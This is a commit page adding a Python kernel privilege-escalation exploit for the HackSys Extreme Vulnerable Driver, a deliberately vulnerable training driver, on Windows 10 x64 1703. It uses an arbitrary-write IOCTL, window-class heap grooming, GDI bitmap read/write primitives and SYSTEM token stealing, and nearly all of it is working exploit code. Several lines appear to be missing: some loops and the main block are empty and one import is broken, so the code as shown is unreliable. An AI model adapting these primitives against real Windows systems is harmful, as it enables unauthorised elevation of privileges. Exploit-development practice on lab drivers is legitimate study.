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GradiusX authored Apr 17, 2017
1 parent ef494e3 commit 8a3b42d
Showing 1 changed file with 389 additions and 0 deletions.
389 changes: 389 additions & 0 deletions Win10 x64 v1703/
Original file line number Diff line number Diff line change
@@ -0,0 +1,389 @@
import ctypes, struct, sys, os, win32con, time
from ctypes import *
from ctypes.wintypes import *
from import shell

ntdll = windll.ntdll
kernel32 = windll.kernel32
gdi32 = windll.gdi32
user32 = windll.user32

def debug_print(message):
""" Prints message in terminal and debugger """
print message
kernel32.OutputDebugStringA(message + "\n")

_fields_ = [("Reserved", c_void_p * 2),
("ImageBase", c_void_p),
("ImageSize", c_long),
("Flags", c_ulong),
("LoadOrderIndex", c_ushort),
("InitOrderIndex", c_ushort),
("LoadCount", c_ushort),
("ModuleNameOffset", c_ushort),
("FullPathName", c_char * 256)]

def get_base_address(input_modules):
""" Returns base address of kernel modules """
modules = {}

# Allocate arbitrary buffer and call NtQuerySystemInformation
system_information = create_string_buffer(0)
systeminformationlength = c_ulong(0)
ntdll.NtQuerySystemInformation(11, system_information, len(system_information), byref(systeminformationlength))

# Call NtQuerySystemInformation second time with right size
system_information = create_string_buffer(systeminformationlength.value)
ntdll.NtQuerySystemInformation(11, system_information, len(system_information), byref(systeminformationlength))

# Read first 4 bytes which contains number of modules retrieved
module_count = c_ulong(0)
module_count_string = create_string_buffer(system_information.raw[:8])
ctypes.memmove(addressof(module_count), module_count_string, sizeof(module_count))

# Marshal each module information and store it in a dictionary<name, SYSTEM_MODULE_INFORMATION>
system_information = create_string_buffer(system_information.raw[8:])
for x in range(module_count.value):
temp_system_information = create_string_buffer(system_information.raw[sizeof(smi) * x: sizeof(smi) * (x+1)])
ctypes.memmove(addressof(smi), temp_system_information, sizeof(smi))
module_name = smi.FullPathName.split('\\')[-1]
modules[module_name] = smi

debug_print("\r\n[>] NtQuerySystemInformation():")

# Get base addresses and return them in a list
base_addresses = []
for input_module in input_modules:
base_address = modules[input_module].ImageBase
debug_print ("\t[+] %s base address: 0x%X" % (input_module, base_address))

return base_addresses

def get_PsISP_kernel_address():
""" Returns kernel base address of PsInitialSystemProcess """
# Get kernel image base
kernelImage = "ntoskrnl.exe"
base_addresses = get_base_address(kernelImage.split())
kernel_image_base = base_addresses[0]
debug_print("[+] Nt Base Address: 0x%X" % kernel_image_base)

# Load kernel image in userland and get PsInitialSystemProcess offset
kernel32.LoadLibraryA.restype = HMODULE
hKernelImage = kernel32.LoadLibraryA(kernelImage)
debug_print("[+] Loading %s in Userland" % kernelImage)
debug_print("[+] %s Userland Base Address : 0x%X" % (kernelImage, hKernelImage))
kernel32.GetProcAddress.restype = c_ulonglong
kernel32.GetProcAddress.argtypes = (HMODULE, LPCSTR)
PsISP_user_address = kernel32.GetProcAddress(hKernelImage,"PsInitialSystemProcess")
debug_print("[+] PsInitialSystemProcess Userland Base Address: 0x%X" % PsISP_user_address)

# Calculate PsInitialSystemProcess offset in kernel land
PsISP_kernel_address_ptr = kernel_image_base + ( PsISP_user_address - hKernelImage)
debug_print("[+] PsInitialSystemProcess Kernel Base Address: 0x%X" % PsISP_kernel_address_ptr)

PsISP_kernel_address = c_ulonglong()
read_virtual(PsISP_kernel_address_ptr, byref(PsISP_kernel_address), sizeof(PsISP_kernel_address));

return PsISP_kernel_address.value

pHMValidateHandle = None

def findHMValidateHandle():
""" Searches for HMValidateHandle() function """
global pHMValidateHandle

kernel32.LoadLibraryA.restype = HMODULE
hUser32 = kernel32.LoadLibraryA("user32.dll")

kernel32.GetProcAddress.restype = c_ulonglong
kernel32.GetProcAddress.argtypes = (HMODULE, LPCSTR)
pIsMenu = kernel32.GetProcAddress(hUser32, "IsMenu")

debug_print("[>] Locating HMValidateHandle()")

debug_print("\t[+] user32.IsMenu: 0x%X" % pIsMenu)

pHMValidateHandle_offset = 0

offset = 0
while (offset < 0x100):
tempByte = cast(pIsMenu + offset, POINTER(c_byte))
# if byte == 0xE8
if tempByte.contents.value == -24:
pHMValidateHandle_offset = pIsMenu + offset + 1
offset = offset + 1

debug_print("\t[+] Pointer to HMValidateHandle offset: 0x%X" % pHMValidateHandle_offset)

HMValidateHandle_offset = (cast(pHMValidateHandle_offset, POINTER(c_long))).contents.value
debug_print("\t[+] HMValidateHandle offset: 0x%X" % HMValidateHandle_offset)

# Add 0xb because relative offset of call starts from next instruction after call, which is 0xb bytes from start of user32.IsMenu
pHMValidateHandle = pIsMenu + HMValidateHandle_offset + 0xb

debug_print("\t[+] HMValidateHandle pointer: 0x%X" % pHMValidateHandle)


class WNDCLASSEX(Structure):
_fields_ = [("cbSize", c_uint),
("style", c_uint),
("lpfnWndProc", WNDPROCTYPE),
("cbClsExtra", c_int),
("cbWndExtra", c_int),
("hInstance", HANDLE),
("hIcon", HANDLE),
("hCursor", HANDLE),
("hBrush", HANDLE),
("lpszMenuName", LPCWSTR),
("lpszClassName", LPCWSTR),
("hIconSm", HANDLE)]

def PyWndProcedure(hWnd, Msg, wParam, lParam):
""" Callback Function for CreateWindow() """
# if Msg == WM_DESTROY
if Msg == 2:
return user32.DefWindowProcW(hWnd, Msg, wParam, lParam)
return 0

classNumber = 0

def allocate_free_window():
""" Allocate and Free a single Window """
global classNumber, pHMValidateHandle

# Create prototype for HMValidateHandle()
HMValidateHandleProto = WINFUNCTYPE (c_ulonglong, HWND, c_int)
HMValidateHandle = HMValidateHandleProto(pHMValidateHandle)

WndProc = WNDPROCTYPE(PyWndProcedure)
hInst = kernel32.GetModuleHandleA(0)

# instantiate WNDCLASSEX
wndClass = WNDCLASSEX()
wndClass.cbSize = sizeof(WNDCLASSEX)
wndClass.lpfnWndProc = WndProc
wndClass.cbWndExtra = 0
wndClass.hInstance = hInst
wndClass.lpszMenuName = 'A' * 0x8f0 # Thought 0x7f0 was 0x1000 but did not work, and this does
wndClass.lpszClassName = "Class_" + str(classNumber)

# Register Class and Create Window
hCls = user32.RegisterClassExW(byref(wndClass))
hWnd = user32.CreateWindowExA(0,"Class_" + str(classNumber),'Franco',0xcf0000,0,0,300,300,0,0,hInst,0)

# Run HMValidateHandle on Window handle to get a copy of it in userland
pWnd = HMValidateHandle(hWnd,1)

# Read pSelf from copied Window
kernelpSelf = (cast(pWnd+0x20, POINTER(c_ulonglong))).contents.value

# Calculate ulClientDelta (tagWND.pSelf - HMValidateHandle())
# pSelf = ptr to object in Kernel Desktop Heap; pWnd = ptr to object in User Desktop Heap
ulClientDelta = kernelpSelf - pWnd

# Read tagCLS from copied Window
kernelTagCLS = (cast(pWnd+0xa8, POINTER(c_ulonglong))).contents.value

# Calculate user-land tagCLS location: tagCLS - ulClientDelta
userTagCLS = kernelTagCLS - ulClientDelta

# Calculate kernel-land tagCLS.lpszMenuName
tagCLS_lpszMenuName = (cast (userTagCLS+0x90, POINTER(c_ulonglong))).contents.value

# Destroy Window

# Unregister Class
user32.UnregisterClassW(c_wchar_p("Class_" + str(classNumber)), hInst)

return tagCLS_lpszMenuName

def alloc_free_windows():
""" Calls alloc_free_window() until current address matches previous one """
global classNumber

previous_entry = 0

while (1):
plpszMenuName = allocate_free_window()
if previous_entry == plpszMenuName:
return plpszMenuName
previous_entry = plpszMenuName
classNumber = classNumber + 1

hManager = HBITMAP()
hWorker = HBITMAP()

def setup_manager_bitmap():
""" Creates Manager Bitmap """
global hManager
dwReturn = c_void_p()
gdi32.CreateBitmap.restype = HBITMAP
hManager = gdi32.CreateBitmap(0x100, 0x6D, 1, 0x1, dwReturn) # Win10x64RS2 size = 0x1020
debug_print ("\t[+] Manager Bitmap handle: 0x%X" % hManager)

def setup_worker_bitmap():
""" Creates Worker Bitmap """
global hWorker
dwReturn = c_void_p()
gdi32.CreateBitmap.restype = HBITMAP
hWorker = gdi32.CreateBitmap(0x100, 0x6D, 1, 0x1, dwReturn) # size = 0x1020
debug_print ("\t[+] Worker Bitmap handle: 0x%X" % hWorker)

def set_address(address):
""" Sets pvScan0 value of Worker Bitmap """
global hManager
write_buf = c_ulonglong(address)
gdi32.SetBitmapBits.argtypes = (HBITMAP, c_ulonglong, LPVOID)
gdi32.SetBitmapBits(hManager, sizeof(write_buf), addressof(write_buf));

def write_virtual(dest, src, len):
""" Writes value pointed at by Worker Bitmap """
global hWorker
gdi32.SetBitmapBits.argtypes = (HBITMAP, c_ulonglong, LPVOID)
gdi32.SetBitmapBits(hWorker, len, src)

def read_virtual(src, dest, len):
""" Reads value pointed at by Worker Bitmap """
global hWorker
gdi32.GetBitmapBits.argtypes = (HBITMAP, LONG, LPVOID)
gdi32.GetBitmapBits(hWorker, len, dest)

# Win10x64 1703 (Creators Update)
# kd> dt ntdll!_EPROCESS uniqueprocessid token activeprocesslinks.
# +0x2e0 UniqueProcessId : Ptr64 Void
# +0x2e8 ActiveProcessLinks :
# +0x000 Flink : Ptr64 _LIST_ENTRY
# +0x008 Blink : Ptr64 _LIST_ENTRY
# +0x358 Token : _EX_FAST_REF

unique_process_id_offset = 0x2e0
active_process_links_offset = 0x2e8
token_offset = 0x358

# Get EPROCESS of current process
def get_current_eprocess(pEPROCESS):
""" Returns ptr to Current EPROCESS structure """
flink = c_ulonglong()
read_virtual(pEPROCESS + active_process_links_offset, byref(flink), sizeof(flink));

current_pEPROCESS = 0
while (1):
unique_process_id = c_ulonglong(0)

# Adjust EPROCESS pointer for next entry
pEPROCESS = flink.value - unique_process_id_offset - 0x8

# Get PID
read_virtual(pEPROCESS + unique_process_id_offset, byref(unique_process_id), sizeof(unique_process_id));

# Check if we're in the current process
if (os.getpid() == unique_process_id.value):

read_virtual(pEPROCESS + active_process_links_offset, byref(flink), sizeof(flink));

# If next same as last, we've reached the end
if (pEPROCESS == flink.value - unique_process_id_offset - 0x8):

return current_pEPROCESS

def trigger_arbitrary_overwrite():
""" Main Logic """
driver_handle = kernel32.CreateFileA("\\\\.\\HackSysExtremeVulnerableDriver", 0xC0000000,0, None, 0x3, 0, None)
if not driver_handle or driver_handle == -1:
print "[!] Driver handle not found : Error " + str(ctypes.GetLastError())

global hManager, hWorker

# Calculate pointer to HMValidateHandle

#Massaging heap for Manager Bitmap
debug_print ("[>] Setting up Manager Bitmap:")
debug_print ("\t[+] Allocating and Freeing Windows")
dup_address = alloc_free_windows()
hManager_pvscan0_offset = dup_address + 0x50
debug_print ("\t[+] Manager bitmap pvscan0 offset: 0x%X" % hManager_pvscan0_offset)

#Massaging heap for Worker Bitmap
debug_print ("[>] Setting up Worker Bitmap:")
debug_print ("\t[+] Allocating and Freeing Windows")
dup_address = alloc_free_windows()
hWorker_pvscan0_offset = dup_address + 0x50
debug_print ("\t[+] Worker bitmap pvscan0 offset: 0x%X" % hWorker_pvscan0_offset)

# Using WWW to overwrite Manager pvscan0 value with address of Worker pvscan0
write_where = hManager_pvscan0_offset
write_what_ptr = c_void_p(hWorker_pvscan0_offset)
evil_input = struct.pack("<Q", addressof(write_what_ptr)) + struct.pack("<Q", write_where)
evil_input_ptr = id(evil_input) + 32
evil_size = len(evil_input)
debug_print ("\n[+] Triggering W-W-W to overwrite Manager pvscan0 value with Worker pvscan0 address")
dwReturn = c_ulong()
kernel32.DeviceIoControl(driver_handle, 0x22200B, evil_input_ptr, evil_size, None, 0,byref(dwReturn), None)

system_EPROCESS = get_PsISP_kernel_address()
debug_print ("\n[+] SYSTEM EPROCESS: 0x%X" % system_EPROCESS)

# Get current EPROCESS
current_EPROCESS = get_current_eprocess(system_EPROCESS)
debug_print ("[+] current EPROCESS: 0x%X" % current_EPROCESS)

system_token = c_ulonglong()
debug_print ("\r\n[+] Reading System TOKEN")
read_virtual(system_EPROCESS + token_offset, byref(system_token), sizeof(system_token));
debug_print ("[+] Writing System TOKEN")
write_virtual(current_EPROCESS + token_offset, byref(system_token), sizeof(system_token));

if shell.IsUserAnAdmin():
debug_print("[*] Enjoy Elevated Privs !\r\n")
debug_print("[-] Exploit did not work. Re-run it!")

def preamble():
""" Description """
debug_print ("")
debug_print ("HackSys Extreme Vulnerable Driver : Arbitrary Overwrite")
debug_print ("")
debug_print ("Target Machine : Windows 10 64-bit 1703 (Creators Update)")
debug_print ("Author: @GradiusX")
debug_print ("")

if __name__ == '__main__':
""" Main Function """

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